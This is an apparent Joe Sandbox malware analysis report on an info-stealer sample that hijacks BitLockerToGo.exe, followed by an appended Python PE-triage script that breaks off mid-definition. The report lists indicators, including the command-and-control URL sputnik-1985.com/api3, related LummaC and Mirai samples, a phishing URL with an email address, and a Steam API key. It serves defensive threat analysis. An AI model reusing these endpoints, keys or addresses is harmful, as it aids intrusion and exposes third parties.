                                                                                                                                                                                  https://medal.tvBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://sputnik-1985.com/-BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://x1.c.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://x1.i.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
URL: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/javascript/reporti
Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://sputnik-1985.com/api3
Source: BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation: unknown
IP: 104.21.112.1
Domain: sputnik-1985.com
Country: United States
Flag: US
ASN: 13335
ASN Name: CLOUDFLARENET
Malicious: true

IP: 104.102.49.254
Domain: steamcommunity.com
Country: United States
Flag: US
ASN: 16625
ASN Name: AKAMAI-AS
Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585134
Start date and time: 2025-01-07 06:00:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NjFiIQNSid.exe (renamed because the original name is a hash value)
Original Sample Name: 49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/0@11/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 34
• Number of non-executed functions: 118
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target NjFiIQNSid.exe, PID 6920, because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 00:01:52
Type: API Interceptor
Description: 9x Sleep call for process: BitLockerToGo.exe modified
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                          • beammp.com/phpmyadmin/
                                                                                                                                                                                                          104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                          • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                          http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          steamcommunity.comZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          AKAMAI-ASUSw3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.49.251.7
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.57.90.149
                                                                                                                                                                                                          malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.34.86
                                                                                                                                                                                                          Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.44.181.15
                                                                                                                                                                                                          Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 95.101.191.171
                                                                                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 104.76.15.30
                                                                                                                                                                                                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 95.101.248.33
                                                                                                                                                                                                          z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.51.98.56
                                                                                                                                                                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.75.90.11
                                                                                                                                                                                                          CLOUDFLARENETUSH565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.74.191
                                                                                                                                                                                                          MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.26.0.123
                                                                                                                                                                                                          FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                          • 104.17.25.14
x86_64.elf | malicious | Mirai | 8.44.60.50
sh4.elf | malicious | Mirai | 162.158.206.216
w3245.exe | malicious | Unknown | 104.21.80.52
w3245.exe | malicious | Unknown | 104.21.80.52
https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com | malicious | HTMLPhisher | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | H565rymIuO.doc | malicious | Unknown | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | w3245.exe | malicious | Unknown | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | w3245.exe | malicious | Unknown | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | sEG2xXpg0X.xlsm | malicious | Unknown | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | Drivespan.dll | malicious | Unknown | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | installer_1.05_36.8.exe | malicious | LummaC | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | malicious | LummaC | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | anrek.mp4.hta | malicious | LummaC Stealer | 104.102.49.254, 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 104.102.49.254, 104.21.112.1
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No created / dropped files found
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                          Entropy (8bit):6.4529386516648986
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:NjFiIQNSid.exe
                                                                                                                                                                                                          File size:6'870'528 bytes
                                                                                                                                                                                                          MD5:29ca15934b67b18a91254ce253a588ca
                                                                                                                                                                                                          SHA1:05dfc5bb1df62ca212e1c8adf5af4542f7ad8b78
                                                                                                                                                                                                          SHA256:49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7
                                                                                                                                                                                                          SHA512:f9d961bb6a1dcfb371fd50aa94d8aac60b0de3cef813ec8bb9003ca202b3d6c3611a526ed890583ce0c401ca79ea8088189ba0fd7e3ce3d47a9e159164e9571e
                                                                                                                                                                                                          SSDEEP:196608:W2J2evtYNFkAvMzhj2F019IxNGqXzIYK:PztYNFkAvMzhj2F019IxNGqXi
                                                                                                                                                                                                          TLSH:44664B90F9DB44F6EA03193048A7A27F17346E068F24CBCBDA507F59FC37AA10972659
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........h..........................N........_...@..........................0l...........@................................
                                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                                          Entrypoint:0x464ee0
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                          Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          jmp 00007FBA84D59950h
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                          mov dword ptr [esp+14h], esi
                                                                                                                                                                                                          mov dword ptr [esp+18h], edi
                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                          mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                          cmp edx, 00000000h
                                                                                                                                                                                                          jne 00007FBA84D5BC89h
                                                                                                                                                                                                          mov eax, 00000000h
                                                                                                                                                                                                          jmp 00007FBA84D5BCE6h
                                                                                                                                                                                                          mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                          cmp edx, 00000000h
                                                                                                                                                                                                          jne 00007FBA84D5BC87h
                                                                                                                                                                                                          call 00007FBA84D5BD79h
                                                                                                                                                                                                          mov dword ptr [esp+20h], edx
                                                                                                                                                                                                          mov dword ptr [esp+24h], esp
                                                                                                                                                                                                          mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                          mov ebx, dword ptr [ebx]
                                                                                                                                                                                                          cmp edx, ebx
                                                                                                                                                                                                          je 00007FBA84D5BC9Ah
                                                                                                                                                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                          mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                          mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                          sub edi, 28h
                                                                                                                                                                                                          mov dword ptr [edi+24h], esp
                                                                                                                                                                                                          mov esp, edi
                                                                                                                                                                                                          mov ebx, dword ptr [ecx]
                                                                                                                                                                                                          mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                          mov dword ptr [esp], ebx
                                                                                                                                                                                                          mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                          mov dword ptr [esp+08h], edx
                                                                                                                                                                                                          call esi
                                                                                                                                                                                                          mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                          mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                          mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                          mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                          mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                          mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                          mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                          mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                          mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                          mov edx, dword ptr [ecx]
                                                                                                                                                                                                          mov eax, esp
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x69a000 | 0x3dc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x69b000 | 0x265e4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5fc020 | 0xa0 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e8055 | 0x2e8200 | eaa051c7530c144900b1170144dba1c3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2ea000 | 0x310358 | 0x310400 | 9756b06b91fcc19cb6669f145769ce4c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5fb000 | 0x9e428 | 0x6e000 | 3fc245563ec7a62de584e9d1022a4fb1 | False | 0.5450284090909091 | data | 6.431380909213618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x69a000 | 0x3dc | 0x400 | b10b5e434003ef71b7b239ab069ff485 | False | 0.4873046875 | data | 4.588210173857591 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x69b000 | 0x265e4 | 0x26600 | 6914548bf8d95cc5ffce43baed979d76 | False | 0.5621437296416938 | data | 6.630875445713944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x6c2000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Imports:
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
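The data-directory, section and import tables above are what a static triage script reads first. The Python below is an added example, not code from the report or from Joe Sandbox: it parses the data directories and section headers of a PE32 file, maps each directory RVA to its section and that section's write permission, computes section entropy, and then scores the kernel32 import list exactly as the page prints it. The PE bytes it parses are a small constructed image that only mimics the shape of the table (.text, a writable .data holding the IAT, a 4-byte .symtab), not the sample itself; the API sets, the Go-runtime profile check and the .symtab rule are the author's own heuristics, not findings the report states.

```python
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DIR_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG", "COPYRIGHT",
             "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
SEC_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def shannon_entropy(data: bytes) -> float:
    return -sum(c / len(data) * math.log2(c / len(data)) for c in Counter(data).values()) if data else 0.0

def parse_pe32(buf: bytes) -> dict:
    """Data directories and section headers of a PE32 image (no import-table walk)."""
    if buf[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsections, opt_size = struct.unpack_from("<H", buf, nt + 6)[0], struct.unpack_from("<H", buf, nt + 20)[0]
    opt = nt + 24  # IMAGE_OPTIONAL_HEADER32 follows the 20-byte file header
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = {DIR_NAMES[i]: struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, *_, chars = struct.unpack_from(SEC_HDR, buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "rawsize": rawsize,
                         "chars": chars, "entropy": shannon_entropy(buf[rawptr:rawptr + rawsize])})
    return {"entry": entry, "dirs": dirs, "sections": sections}

def section_of(pe: dict, rva: int) -> str:
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return "<none>"

def triage_layout(pe: dict) -> list:
    """The checks an analyst reads off the section and directory tables."""
    out, by_name = [], {s["name"]: s for s in pe["sections"]}
    ep = section_of(pe, pe["entry"])
    if ep == "<none>" or not by_name[ep]["chars"] & IMAGE_SCN_MEM_EXECUTE:
        out.append(f"entry point {pe['entry']:#x} outside executable sections")
    for d in ("IMPORT", "IAT", "BASERELOC"):
        rva, size = pe["dirs"][d]
        if size:
            sec = section_of(pe, rva)
            access = "writable" if by_name.get(sec, {}).get("chars", 0) & IMAGE_SCN_MEM_WRITE else "read-only"
            out.append(f"{d} at {rva:#x} -> {sec} ({access})")
    if ".symtab" in by_name:  # the Go linker emits .symtab; MSVC and MinGW images do not
        out.append(".symtab present: Go toolchain layout")
    return out

PAGE_IMPORTS = {"kernel32.dll": [  # static import table exactly as the report lists it
    "WriteFile", "WriteConsoleW", "WaitForMultipleObjects", "WaitForSingleObject", "VirtualQuery", "VirtualFree",
    "VirtualAlloc", "SwitchToThread", "SuspendThread", "SetWaitableTimer", "SetUnhandledExceptionFilter",
    "SetProcessPriorityBoost", "SetEvent", "SetErrorMode", "SetConsoleCtrlHandler", "ResumeThread",
    "PostQueuedCompletionStatus", "LoadLibraryA", "LoadLibraryW", "SetThreadContext", "GetThreadContext",
    "GetSystemInfo", "GetSystemDirectoryA", "GetStdHandle", "GetQueuedCompletionStatusEx", "GetProcessAffinityMask",
    "GetProcAddress", "GetEnvironmentStringsW", "GetConsoleMode", "FreeEnvironmentStringsW", "ExitProcess",
    "DuplicateHandle", "CreateWaitableTimerExW", "CreateThread", "CreateIoCompletionPort", "CreateFileA",
    "CreateEventA", "CloseHandle", "AddVectoredExceptionHandler"]}
THREAD_HIJACK = {"SuspendThread", "GetThreadContext", "SetThreadContext", "ResumeThread"}
REMOTE_WRITE = {"VirtualAllocEx", "WriteProcessMemory", "NtWriteVirtualMemory", "NtMapViewOfSection"}
# kernel32 entries the Go runtime itself imports for its scheduler and netpoller (author's list)
GO_RUNTIME = THREAD_HIJACK | {"AddVectoredExceptionHandler", "CreateIoCompletionPort", "GetQueuedCompletionStatusEx",
                              "PostQueuedCompletionStatus", "SwitchToThread", "SetProcessPriorityBoost", "CreateWaitableTimerExW"}

def triage_imports(imports: dict) -> dict:
    """Separate remote-process injection primitives from the Go runtime's own thread-control imports."""
    names = {n for lst in imports.values() for n in lst}
    return {"thread_hijack_apis": sorted(names & THREAD_HIJACK),
            "remote_write_apis": sorted(names & REMOTE_WRITE),
            "dynamic_resolution": bool(names & {"GetProcAddress", "LoadLibraryA", "LoadLibraryW"}),
            "go_runtime_profile": set(imports) == {"kernel32.dll"} and GO_RUNTIME <= names}

def build_sample_pe() -> bytes:
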